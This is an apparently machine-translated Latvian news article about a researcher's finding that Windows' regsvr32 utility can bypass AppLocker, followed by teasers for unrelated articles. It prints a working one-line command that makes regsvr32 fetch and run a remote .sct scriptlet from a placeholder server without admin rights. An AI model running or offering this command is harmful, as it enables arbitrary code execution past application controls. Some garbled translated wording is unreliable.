Regsvr32 var izmantot, lai apietu applocker Windows 10
Video: Applocker - Запрет на запуск программ 2024
Kolorādo pētnieks Keisija Smits ir noskaidrojis, ka Regsvr32 var izmantot, lai apietu AppLocker operētājsistēmā Windows 10, un tā ir liela problēma datoru lietotājiem, īpaši tiem, kas atrodas biznesa vidē.
AppLocker pirmo reizi tika ieviests operētājsistēmās Windows 7 un Windows Server 2008 R2. Tas ir paredzēts, lai administratori varētu noteikt, kura grupa vai lietotāji var izmantot dažas vai visas lietojumprogrammas, pamatojoties uz failu unikālo identitāti. Ja esat persona, kas tiecas izmantot AppLocker, tad vispārzināms, ka to var izmantot, lai izveidotu noteiktus noteikumus, kas ļautu lietojumprogrammām palaist vai apturēt tās savās dziesmās.
Tiem, kas varētu nezināt, Regvr32 var izmantot, lai reģistrētu un reģistrētu DLL. Šis nav viena klikšķa rīks, jo tas ir komandrindas utilīts, tāpēc tikai pieredzējušiem datoru lietotājiem jācenšas izmantot tā piedāvātās iespējas.
Mēs saprotam, ka, izmantojot šo paņēmienu, tas nemaina datorsistēmas reģistru, kas administratoriem apgrūtina zināt, vai ir veiktas kādas izmaiņas.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
Apbrīnojams ir tas, ka regsvr32 jau apzinās starpniekserveri, izmanto TLS, seko novirzīšanai utt.… Un… Jūs uzminējāt parakstītu, noklusējuma MS bināru failu. Tātad viss, kas jums jādara, ir hostēt savu.sct failu jūsu kontrolētajā vietā, ”rakstīja Smits.
Iepriekš minētajam paņēmienam nav vajadzīgas administratīvas privilēģijas, un tas nemaina reģistru. Turklāt skriptus var izsaukt gan caur HTTP, gan ar HTTPS. Pašlaik Microsoft nav izlaidis šīs mazās problēmas labojumu, tāpēc šobrīd vienīgā iespēja ir bloķēt Regsvr32 caur Windows ugunsmūri.
Interesanti, ka programmatūras gigantam vēl nav jāreaģē uz šo drošības problēmu, ar kuru saskaras tā operētājsistēma. Tagad, kad tas ir atvērts, mēs gaidām dzirdēt kaut ko no uzņēmuma, kā arī sarunas par nākotnes plāksteri.
Hakeri izmantoja malu, lai apietu vmware darbstaciju pwn2own 2017 laikā
Šī gada Pwn2Own konkurss tika pabeigts pēc trīs dienu uzlaušanas pārlūkprogrammās un operētājsistēmās. Beigās Microsoft Edge pārlūks kļuva par zaudētāju pēc tam, kad pasākuma laikā neizdevās novērst uzbrukumus. Ķīniešu drošības firmas Qihoo 360 komanda izmantoja Edge un sasaistīja divus drošības trūkumus, lai izvairītos no VMware…
Vpn bloķēts ŪA? instalējiet šos rīkus, lai apietu ierobežojumus
Ja jūsu parastais VPN tika bloķēts AAE, izlasiet šo rokasgrāmatu, lai uzzinātu, kādi ir labākie VPN risinājumi, kurus varat izmantot šajā valstī.
Vai klēpjdatora wi-fi var izmantot kā karsto punktu? šeit ir vislabākā programmatūra, ko izmantot
Ja jums ir nepieciešama uzticama Wi-Fi tīklāja programmatūra, labākās iespējas jums ir Connectify, MHotSpot, MyPublicWifi, HostedNetworkStarter un OSToto.